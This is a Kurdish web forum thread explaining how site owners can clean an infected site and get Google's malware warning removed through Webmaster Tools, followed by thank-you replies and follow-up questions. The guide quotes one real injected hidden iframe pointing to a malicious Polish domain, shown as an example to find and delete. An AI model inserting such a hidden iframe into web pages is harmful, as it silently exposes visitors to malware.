1

بابه‌ت: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

سڵاو،
پاش ئه‌وه‌ی كه‌ ژماره‌یه‌ك ماڵپه‌ڕ تووشی ئه‌و كێشه‌یه‌ بوون، به‌ پێویستم زانی ئه‌و هه‌نگاوانه‌ ئاماژه‌ پێبده‌م كه‌ پێویستن وه‌ك خاوه‌ن ماڵپه‌ڕ جێبه‌جێیان بكه‌یت بۆ سڕینه‌وه‌ی ئه‌و په‌یامه‌ی كه‌ گوایه‌ ماڵپه‌ڕه‌كه‌ت ڤایرۆس، كۆدی زیانبه‌خش بڵاو ده‌كاته‌وه‌.

سه‌ره‌تا، ئایا هۆكاری درووستبوونی ئه‌و كێشه‌یه‌ چیه‌؟
١، ماڵپه‌ڕه‌كه‌ت ڤایرۆس یان كۆدی زیانبه‌خشی تێدایه‌.
٢، ماڵپه‌ڕه‌كه‌ت له‌سه‌ر ڕاژه‌كارێكه‌ كه‌ ڤایرۆسی له‌ خۆ گرتووه‌.
٣، ماڵپه‌ڕه‌كه‌ت له‌سه‌ر ڕاژه‌كارێكه‌ كه‌ زۆر ماڵپه‌ڕی له‌سه‌ره‌ كه‌ هه‌مان كێشه‌یان هه‌یه‌.

http://aso.naderi.googlepages.com/gvirus1.png

واته‌ مه‌رج نیه‌ به‌ بوونی ئه‌و په‌یامه‌، ماڵپه‌ڕه‌كه‌ت ڤایرۆسی تێدا بێت.

چۆنیه‌تی چاره‌سه‌ركردنی،
به‌ شێوه‌یه‌كی گشتیی هه‌موو ئه‌و ماڵپه‌ڕانه‌ كه‌ ئه‌م په‌یامه‌یان له‌سه‌ر پیشان ده‌درێت، ده‌كرێت به‌ ١ شێواز چاره‌سه‌ر بكرێن.

هه‌نگاوه‌كانی چاره‌سه‌ركردن،
١، دژه‌ڤایرۆسێكی چاك (من Dr.Web ــم پێ باشه‌) له‌ نێو كۆمپیوته‌ره‌كه‌ت دابمه‌زرێنه‌، دواتر هه‌موو په‌ڕه‌ و په‌ڕگه‌كانی ماڵپه‌ڕه‌كه‌ت له‌ رێی FTP ـه‌وه‌ دابگره‌ و به‌و دژه‌ ڤایرۆسه‌ چێكیان بكه‌، ئه‌گه‌ر ڤایرۆس دۆزرایه‌وه‌ چاره‌سه‌ری بكه‌.
٢، هه‌ژمارێك له‌ گووگڵ بكه‌وه‌ ئه‌گه‌ر تا ئیستا نیته‌،
https://www.google.com/accounts/NewAcco … &hl=en

ئه‌گه‌ر هه‌ته‌، كرته‌ لێره‌ بكه‌ و بچۆ ژووره‌وه‌ بۆ نێو Google Webmaster Tools،
http://www.google.com/webmasters/tools

له‌م هه‌نگاوه‌دا ماڵپه‌ڕه‌كه‌ت ده‌نێرێت بۆ گووگڵ بۆ چاولێكردن بۆ ئه‌وه‌ی كه‌ بیسله‌مێنیت كه‌ ماڵپه‌ڕه‌كه‌ت ڤایرۆسی تیدا نیه‌ و ئه‌وه‌ش ده‌بێته‌ هۆكاری سڕینه‌وه‌ی ئه‌و په‌یامه‌.
كرته‌ بكه‌ نێو ئه‌و خانه‌یه‌ كه‌ نووسراوه‌،
Click Here To Add a Site و له‌وێدا به‌سته‌ری ماڵپه‌ڕه‌كه‌ت بنووسه‌، بۆ نموونه‌ www.domain.com یان domain.com.

http://aso.naderi.googlepages.com/gvirus4.png

دواتر ده‌بێ ماڵپه‌ڕه‌كه‌ت Verify بكه‌یت، كرته‌ بكه‌ سه‌ر Verify Your Website،

http://aso.naderi.googlepages.com/gvirus5.png

ده‌توانی به‌ ٢ شێواز ماڵپه‌ڕه‌كه‌ت Verify بكه‌یت، ده‌توانی شێوازی باركردنی په‌ڕه‌یه‌كی HTML ی هه‌ڵبژێریت،
Upload an HTML file.

http://aso.naderi.googlepages.com/gvirus6.png

له‌ ژێر ئه‌وه‌ هه‌ڵبژاردنه‌دا، شتێكی وه‌ك ئه‌مه‌ ده‌رده‌چێت، googleexxxxxxd0ca9d2f.html، پێویسته‌ په‌ڕه‌یه‌كی به‌تاڵی HTML درووست بكه‌یت و به‌و ناوه‌ پاشه‌كه‌وتی بكه‌یت، (تكایه‌ ئه‌و ناوه‌ به‌كار ببه‌ كه‌ بۆ خۆت ده‌ركه‌وتووه‌، نه‌ك ئه‌وه‌ی كه‌ من دامناوه‌).
له‌ هه‌ر پرۆگرامێكی نووسین بێت ده‌توانی ئه‌و كاره‌ بكه‌یت، بۆ نموونه‌ Notepad یان Frontpage، په‌ڕه‌یه‌كی نوێ و به‌تاڵ بكه‌وه‌، دواتر ڕاسته‌وخۆ پاشه‌كه‌وتی بكه‌ و ئه‌و ناوه‌ی بۆ بنووسه‌ كه‌ گووگڵ پێی پێشنیار كردیت.

پاشان له‌ ڕێی FTP ـه‌وه‌ باری بكه‌ نێو ماڵپه‌ڕه‌كه‌ت، دواتر كرته‌ له‌سه‌ر دووگمه‌ی Verify بكه‌، ئه‌گه‌ر هه‌موو هه‌نگاوه‌كانت به‌ درووستی جێبه‌جێ كردبێت، ده‌بێت په‌یامی You've successfully verified http://domain.com ببینیت. ئه‌گه‌ر وانه‌بوو، تكایه‌ چاوێك به‌ هه‌نگاوه‌كاندا بخشێنه‌وه‌.

له‌ سه‌ر هه‌مان په‌ڕه‌ی سه‌ره‌تا، په‌یامێك ده‌بینی كه‌ تێدا ئاماژه‌ به‌وه‌ دراوه‌ كه‌ ماڵپه‌ڕه‌كه‌ت/ به‌شێك له‌ ماڵپه‌ڕه‌كه‌ت، كێشه‌ی ناوبراوی تێدایه‌ و ده‌توانی زانیاریی له‌سه‌ر بخوێنیته‌وه‌ یان داوای دووباره‌ چاوپێداخشانه‌وه‌ بكه‌یت، لێره‌دا ده‌ته‌وێت داواكاریی دووباره‌ جاوپێدا خشانه‌وه‌ بنێریت بۆ گووگڵ، بۆیه‌ كرته‌ له‌ Request a review ده‌كه‌یت.
گرینگه‌ كه‌ تێبین ئه‌وه‌ بكه‌یت ئه‌و په‌ڕانه‌ی كه‌ گووگڵ ده‌ڵێت زیانبه‌خشن (ئیمكانی زۆری هه‌یه‌) كه‌ وابن، بۆیه‌ ده‌بێت چاوی لێبكه‌یت و كێشه‌كه‌ی بدۆزیه‌وه‌، بۆ نموونه‌ ئه‌م ماڵپه‌ڕه‌ له‌ نێو كۆده‌كانی دا ئه‌م كۆده‌ هه‌بوو،

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

كه‌ به‌سته‌ر ده‌كات بۆ په‌ڕه‌یه‌كی زیانبه‌خش.
بۆیه‌ ده‌بێت بسڕێته‌وه‌ پێش ناردنی داواكاری چاوپێدا خشاندنه‌وه‌.

ئه‌گه‌ر هه‌موو هه‌نگاوه‌ پێویسته‌كان جێبه‌جێ كراون،
I certify that I have removed badware or badware links from my site, according to  StopBadware.org's Security Tips For Websites
چالاك بكه‌ و دواتر كرته‌ له‌ دووگمه‌ی Request a review بكه‌.

http://aso.naderi.googlepages.com/gvirus7.png

به‌و شێوه‌یه‌ هه‌نگاوه‌كان كۆتاییان پێدێت، ده‌بێ ماوه‌ی ٢٤ كاتژمێر یان زۆرتر چاوه‌ڕوانبیت بۆ ئه‌وه‌ی ئه‌وه‌ی ئه‌نجامی هه‌بێت.

كۆتایی.

هیچ شتێك ئه‌وه‌نده‌ باش نییه‌ نه‌توانرێت باشتر بكرێت :::http://webdarej.com

2

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ئه‌مه‌ روونکرنه‌وه‌یه‌ به‌راستی ده‌ست خۆش

3

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

سڵاو
ده‌ست خۆش به‌هیوای سه‌رکه‌وتنت ڕوونکردنه‌وه‌یه‌کی گرنگ وپێویست بووله‌م کاته‌تدا به‌هیوای خزمه‌تی زیاتر

ماڵپه‌ڕی کۆره‌ک تیڤی: www.korak.tv
په‌یوه‌ندی: [email protected]

4

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

دەست خۆش

www.kshtwkal.info

5

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

dast xosh

6

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

هه‌ر بژی کاك ئاسۆ ،

ئایا ده‌بێت سه‌رچاوه‌ی خۆ ترانجاندنی ئه‌و ڤایرۆسه‌ چی بێت .

7

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ئایا ده‌بێت سه‌رچاوه‌ی خۆ ترانجاندنی ئه‌و ڤایرۆسه‌ چی بێت .

له‌ گه‌ڵ ئه‌نفله‌وه‌زای به‌راز بڵاوبۆوه‌  lol
بۆ خۆشی بوو

به‌س كاك ئاسۆ ئاماژه‌ی پێكردووه‌

سه‌ره‌تا، ئایا هۆكاری درووستبوونی ئه‌و كێشه‌یه‌ چیه‌؟
١، ماڵپه‌ڕه‌كه‌ت ڤایرۆس یان كۆدی زیانبه‌خشی تێدایه‌.
٢، ماڵپه‌ڕه‌كه‌ت له‌سه‌ر ڕاژه‌كارێكه‌ كه‌ ڤایرۆسی له‌ خۆ گرتووه‌.
٣، ماڵپه‌ڕه‌كه‌ت له‌سه‌ر ڕاژه‌كارێكه‌ كه‌ زۆر ماڵپه‌ڕی له‌سه‌ره‌ كه‌ هه‌مان كێشه‌یان هه‌یه‌.

زانـستـپه‌روه‌رانـی كورد                             > www.Zkurd.org   
ویـکیپیدیاى کــوردى ســۆرانى!                     > www.ckb.wikipedia.org
ئه‌رشیفی بابه‌ته‌كانی فێرگه‌ی هه‌موو بۆ كورد > www.webchin.org/babet

8

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ئه‌و دوو ماڵپه‌ره‌ش هاتنه‌ ڕێز نه‌مران

http://www.aramshad.com/
http://www.kurdzhin.net/sarata.php

وه‌ی لێهاتیه‌ نه‌وێرین سه‌ردانی هیچ مالپه‌رێك بكه‌ین

زانـستـپه‌روه‌رانـی كورد                             > www.Zkurd.org   
ویـکیپیدیاى کــوردى ســۆرانى!                     > www.ckb.wikipedia.org
ئه‌رشیفی بابه‌ته‌كانی فێرگه‌ی هه‌موو بۆ كورد > www.webchin.org/babet

9

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

سوپاس ، من بۆ هۆکاری ١ ده‌چم ، چونکه‌ به‌س ئه‌و سکریپته‌یان وایه‌ که‌ تایبه‌ته‌ به‌ بارکردنی وێنه‌ ، ئه‌گینا ئه‌وه‌ی ژوومله‌ و سکریپتی که‌م دابه‌زاندووه‌ کێشه‌یان نییه‌ .

ئه‌وه‌ی کوردژین لای من کرایه‌وه‌ ، به‌ڵام ئه‌وی تریان نا .

کاتێکی خۆش

10

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ده‌ستت خۆش ڕوونكردنه‌وه‌يه‌كی جوانه‌ كاك ئاسۆ ،  ئه‌و هۆكاره‌شت چاره‌سه‌ر كرد smile
به‌ڵام پرسيار :  ئايا هه‌بوونی ئه‌و په‌ڕه‌يه‌ی گۆگڵ له‌ناو ماڵپه‌ڕ هۆكاری زيانبه‌خشی نيه‌ ؟ واتا هه‌ركاتێك هه‌بێت نه‌يسڕيته‌وه‌ كێه‌شه‌ درووست نابێت ؟ دوای ئه‌وه‌ی كه‌ وه‌ڵامت بۆ گه‌ڕايه‌وه‌ ئه‌كرێت نه‌يسڕيته‌وه‌ ؟


زۆر سووپاس

هه‌موومان بۆ وێبچن
وێبچن بۆ هه‌موومان

11

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

تا چاكی نه‌كه‌یت، گووگڵ په‌یامه‌كه‌ی لانابات.

هیچ شتێك ئه‌وه‌نده‌ باش نییه‌ نه‌توانرێت باشتر بكرێت :::http://webdarej.com

12

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

هه‌مووئه‌وماڵپه‌رانه‌لای من ده‌کرێنه‌وه‌ئه‌نتی ڤیرۆسه‌که‌شـم به‌پاره‌بۆیان کڕیوم roll

ماڵپه‌ڕی کۆره‌ک تیڤی: www.korak.tv
په‌یوه‌ندی: [email protected]

13

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

كاك ئاسۆ من پرسياره‌كه‌م به‌م شێوه‌ بوو :

به‌ڵام پرسيار :  ئايا هه‌بوونی ئه‌و په‌ڕه‌يه‌ی گۆگڵ له‌ناو ماڵپه‌ڕ هۆكاری زيانبه‌خشی نيه‌ ؟ واتا هه‌ركاتێك هه‌بێت نه‌يسڕيته‌وه‌ كێه‌شه‌ درووست نابێت ؟ دوای ئه‌وه‌ی كه‌ وه‌ڵامت بۆ گه‌ڕايه‌وه‌ ئه‌كرێت نه‌يسڕيته‌وه‌ ؟

ئايا ئه‌بێت دوای چاره‌سه‌ركردنه‌كه‌ بيسڕيته‌وه‌ په‌ڕه‌ی گۆگڵه‌كه‌ له‌ناو ماڵپه‌ڕ ؟

هه‌موومان بۆ وێبچن
وێبچن بۆ هه‌موومان

14

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ئێستا تێگه‌شتم، ئه‌گه‌ر بته‌وێ به‌رده‌وام سوود ببینیت له‌ Google Webmaster Tools، ئه‌وه‌ باشتر وایه‌ بمێنێت، ئه‌گه‌ر نه‌ پێویست نیه‌.

هیچ شتێك ئه‌وه‌نده‌ باش نییه‌ نه‌توانرێت باشتر بكرێت :::http://webdarej.com

15

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

سڵاو،
سوپاس بۆ ئه‌م بابه‌ته‌.

هه‌نگاوی یه‌كه‌می چاره‌سه‌ر كردن كاتێك كارایه‌، گه‌ر ڤایرۆسه‌كه‌ له‌و ڕاژه‌كاره‌دا له‌ بواره‌كه‌ی تۆدا بێت، وانییه‌؟؟
smile
من زۆر له‌ ماڵپه‌ره‌ كوردییه‌كان ده‌بینیم، كه‌ گرنگی ناده‌ن به‌ ڤایرۆس، تاكوو ئیستا بڕوام نییه‌ هیچ ده‌زگایه‌ك له‌ كوردستاندا پاره‌ی بۆ ئه‌و به‌رنامه‌یه‌ ته‌رخان كردبێت، گه‌ر هه‌بێت ده‌گمه‌نن. ناشوكری نه‌بێت له‌ زانكۆكانیشا نییه‌ smile

شایه‌نی باسه‌ ئه‌و په‌یامه‌ له‌ وێبگه‌ڕی IE نیشان نادرێت، كاتێك ماڵپه‌ری سبه‌ی وای لێهاتبوو، به‌ FF سه‌ردانم ده‌كرد ئه‌و په‌یامه‌ ده‌هات، له‌ ئنیته‌رنێث ئێكسپلۆره‌ردا وا نه‌بوو.

دۆت کۆرد / http://www.dotkurd.org

16

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ده‌ست خۆش

17

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ئێستا تێگه‌شتم، ئه‌گه‌ر بته‌وێ به‌رده‌وام سوود ببینیت له‌ Google Webmaster Tools، ئه‌وه‌ باشتر وایه‌ بمێنێت، ئه‌گه‌ر نه‌ پێویست نیه‌.

من له‌ ئه‌م دێڕه‌ نه‌گه‌يشتم كاك ئاسۆ

ئه‌گه‌ر نه‌ پێویست نیه‌.

مه‌به‌ستت چيه‌  ؟

هه‌موومان بۆ وێبچن
وێبچن بۆ هه‌موومان

18 (دەستکاری کراوە: hemn2 2009-05-21 17:56:16)

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ده‌ست خۆش کاک ئاسۆ بۆ ئه‌م شیکردنه‌وه‌ جوانه‌.
کاک ئاسۆ ئایا Dr.Web ده‌توانرێ وه‌ک ئانتی ڤیرۆسێکی دایمی بکاری بهێنین، مه‌به‌ستم وه‌کوو نۆرتۆن، ئافگه‌، هتد...؟

زۆر سوپاس

19

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ده‌ست خۆش کاک ئاسۆ هه‌ر بژیت

20

وه‌ڵام: چۆنیه‌تی چاره‌سه‌ركردنی كێشه‌ی "ڤایرۆس" له‌ ماڵپه‌ڕدا

ده‌ست خۆش به‌هیوای سه‌رکه‌وتنت بؤ دةخوازم

هيوادارم سةردانى ئةم سايتةكةن
http://santana4snaek.ueuo.com/
بةسودبيت بؤتان